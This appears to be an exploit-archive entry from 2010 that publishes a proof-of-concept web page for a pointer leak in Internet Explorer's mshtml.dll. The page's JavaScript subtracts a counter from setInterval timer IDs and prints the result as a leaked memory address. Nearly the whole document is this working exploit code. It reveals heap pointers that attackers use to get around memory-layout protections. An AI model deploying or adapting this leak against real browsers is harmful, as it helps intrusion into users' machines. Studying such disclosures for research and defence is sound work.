Microsoft MSHTML.DLL CTIMEOUTEVENTLIST::INSERTINTOTIMEOUTLIST Memory Leak [0-Day]

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Microsoft MSHTML.DLL CTIMEOUTEVENTLIST::INSERTINTOTIMEOUTLIST Memory Leak [0-Day]
# Published : 2010-07-09
# Author : Ruben Santamarta
# Previous Title : Ghost Recon Advanced Warfighter Integer Overflow and Array Indexing Overflow
# Next Title : MP3 Cutter v1.5 DoS Exploit

<html>
<!--http://reversemode.com/index.php?option=com_content&task=view&id=68&Itemid=1 -->
<!-- mshtml.dll CTimeoutEventList::InsertIntoTimeoutList Timer ID Pointer leak - Rubén Santamarta www.reversemode.com -->

    <head>

        
        <title>mshtml.dll CTimeoutEventList::InsertIntoTimeoutList Timer ID Pointer leak - Rubén Santamarta www.reversemode.com</title>

        <script type='text/javascript'>
						var i = 1; // counter
						
            function LeakOrDie() {
            	var t;
							t=setInterval("foo()",2000);
							t-=i;
							document.getElementById('atun').innerHTML = '<b> Pointer leaked:</b> '+'0x'+t.toString(16);
							i++;
            }
            
	          function foo()
	          {
	          	return;
	          }
            
            
        </script>

    </head>

    <body>

	
	<INPUT TYPE=button VALUE="Press to leak"  ONCLICK="LeakOrDie();">

	<br /><br />

		<div id='atun'>		</div>
    
   </body>

</html>